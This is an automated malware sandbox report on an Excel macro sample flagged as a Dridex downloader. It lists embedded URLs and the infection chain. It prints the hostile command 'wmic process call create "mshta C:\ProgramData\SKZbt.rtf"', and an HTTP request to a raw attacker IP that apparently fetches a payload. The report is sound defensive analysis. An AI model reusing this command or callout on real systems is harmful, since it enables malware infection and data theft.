Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://tasks.office.comst
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://tellmeservice.osi.office.netst
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.htmlr
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicesKO
Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://web.microsoftstream.com/video//
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosh
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://wus2.contentsync.
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://www.odwebp.svc.msd
Source: global traffic HTTP traffic detected: GET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: pissoffHost: 157.230.250.107:8080

E-Banking Fraud:

barindex
Yara detected Dridex Downloader
Source: Yara match File source: C:\ProgramData\SKZbt.rtf, type: DROPPED

System Summary:

barindex
Found malicious Excel 4.0 Macro
Source: 08676789691.xlsm Macro extractor: Sheet: Macro1 contains: mshta
Found Excel 4.0 Macro with suspicious formulas
Source: 08676789691.xlsm Initial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheet
Source: 08676789691.xlsm Initial sample: Sheet name: Macro1
Contains functionality to create processes via WMI
Source: EXCEL.EXE, 00000000.00000003.536566000.00000000130A9000.00000004.00000001.sdmp Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\SKZbt.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Defaultre=::=::\=C:=C:\Users\user\DocumentsALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=LIJDSFKUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsE=userUSERPROFILE=C:\Users\userwindir=C:\Windows:\Users\userwindir=C:\WindowsPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows71USERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsC:\Users\userwindir=C:\Windows
Found obfuscated Excel 4.0 Macro
Source: 08676789691.xlsm Macro extractor: Sheet: Macro1 high usage of CHAR() function: 15
Found a hidden Excel 4.0 Macro sheet
Source: 08676789691.xlsm Macro extractor: Sheet name: Macro1
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: 08676789691.xlsm ReversingLabs: Detection: 15%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\SKZbt.rtf"
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\SKZbt.rtf
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\SKZbt.rtf" Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\SKZbt.rtf Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2596:120:WilError_01
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{77711178-B0E5-4820-B553-C75559596DF4} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@7/8@0/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 08676789691.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: 08676789691.xlsm Initial sample: OLE zip file path = docProps/custom.xml
Source: 72530000.0.dr Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

barindex
Creates and opens a fake document (probably a fake document to hide exploiting)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: cmd line: skzbt.rtf Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: cmd line: skzbt.rtf Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 2712 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: EXCEL.EXE, 00000000.00000003.428798155.000000000F3F3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.432602253.000000000F421000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.428829539.000000000F421000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.627235109.000000000F421000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429646756.000000000F3F3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.432498654.000000000F3F3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.627181251.000000000F3F3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000003.544233598.000001E529D14000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.619578044.000001ED2C934000.00000004.00000001.sdmp, mshta.exe, 00000015.00000003.544266956.000001ED2C92F000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616950624.000001E529D13000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: EXCEL.EXE, 00000000.00000002.626127610.000000000D685000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWp@
Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Anti Debugging:

barindex
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\SKZbt.rtf Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Source: EXCEL.EXE, 00000000.00000002.617645413.0000000002D70000.00000002.00020000.sdmp, mshta.exe, 00000015.00000002.617188130.000001E52A0C0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.617645413.0000000002D70000.00000002.00020000.sdmp, mshta.exe, 00000015.00000002.617188130.000001E52A0C0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: EXCEL.EXE, 00000000.00000002.617645413.0000000002D70000.00000002.00020000.sdmp, mshta.exe, 00000015.00000002.617188130.000001E52A0C0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: EXCEL.EXE, 00000000.00000002.617645413.0000000002D70000.00000002.00020000.sdmp, mshta.exe, 00000015.00000002.617188130.000001E52A0C0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs